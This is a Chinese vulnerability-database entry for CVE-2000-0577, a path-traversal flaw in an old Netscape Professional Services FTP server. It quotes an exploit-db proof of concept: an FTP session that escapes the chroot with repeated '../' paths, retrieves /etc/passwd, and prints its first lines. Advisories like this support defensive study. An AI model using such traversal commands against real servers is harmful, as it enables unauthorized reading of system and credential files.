Netscape Professional Services FTP服务器漏洞

Netscape Professional Services FTP服务器漏洞

漏洞ID 1105892 漏洞类型 访问验证错误
发布时间 2000-06-21 更新时间 2005-07-27
图片[1]-Netscape Professional Services FTP服务器漏洞-安全小百科CVE编号 CVE-2000-0577
图片[2]-Netscape Professional Services FTP服务器漏洞-安全小百科CNNVD-ID CNNVD-200006-079
漏洞平台 Unix CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20046
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-079
|漏洞详情
NetscapeProfessionalServicesFTPServer1.3.6版本存在漏洞。远程攻击者借助..(点点)攻击可以读取任意文件。
|漏洞EXP
source: http://www.securityfocus.com/bid/1411/info

Certain versions of the LDAP-aware Netscape Professional Services FTP Server (distributed with Enterprise Web Server) have a serious vulnerability which may lead to a remote or local root compromise. The vulnerability in essence is a failure of of the FTP server to enforce a restricted user environment (chroot). By failing to do this an FTP (anonymous or otherwise) user may download any file on the system (/etc/passwd etc.) as well as upload files at will at the privilege level of the FTP daemon.

Furthermore (quoted from the original attached message) this FTP server supports LDAP users; different LDAP accounts are served on single physical UID. This means, any user can access and eventually overwrite files on other accounts; as it's used in cooperation with webserver, typically virtual web servers are affected. 

$ ftp ftp.XXXX.xxx
Connected to ftp.XXXX.xxx.
220-FTP Server - Version 1.36 - (c) 1999 Netscape Professional Services
220 You will be logged off after 1200 seconds of inactivity.
Name (ftp.XXXX.xxx:lcamtuf): anonymous
331 Anonymous user OK, send e-mail address as password.
Password:
230 Logged in OK
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd ../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/o/n/anonymous/dupa" because No such
file or directory

[Well... this won't work... uh, lovely physical path, btw ;]

ftp> cd /../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/n/dupa" because No such file or
directory
ftp> cd /../../../../dupa
550 Can't change directory to
"/www1/customer/www.XXXX.xxx/a/dupa" because
No such file or directory

[Erm? Good God!]

ftp> cd /../../../../../../../../etc/dupa
550 Can't change directory to "/etc/dupa" because No such file or
directory
ftp> cd /../../../../../../../../etc/
250 CWD command successful.
ftp> get /../../../../../../../../etc/passwd KUKU
local: KUKU remote: /../../../../../../../../etc/passwd
200 PORT successfull, connected to A.B.C.D port 62437
150-Type of object is "unknown/unknown". Transfer MODE is BINARY.
150 Opening data connection
226 File downloaded successfully (602 bytes, 602 bytes xmitted)
602 bytes received in 1.71 secs (0.34 Kbytes/sec)
ftp> quit
221-Goodbye. You uploaded 0 and downloaded 1 kbytes.
221 CPU time spent on you: 0.100 seconds.

$ cat KUKU
root:x:0:1:Super-User:/:/sbin/sh
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
...
|参考资料

来源:BUGTRAQ
名称:20000621NetscapeFTPServer-“Professional”ashell:>
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1411
链接:http://www.securityfocus.com/bid/1411
来源:BUGTRAQ
名称:20000629(forw)Re:NetscapeftpServer(fwd)
链接:http://archives.neohapsis.com/archives/bugtraq/2000-06/0345.html

相关推荐: ASPNuke Article.ASP SQL Injection Vulnerability

ASPNuke Article.ASP SQL Injection Vulnerability 漏洞ID 1096817 漏洞类型 Input Validation Error 发布时间 2005-04-22 更新时间 2005-04-22 CVE编号 N/A…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享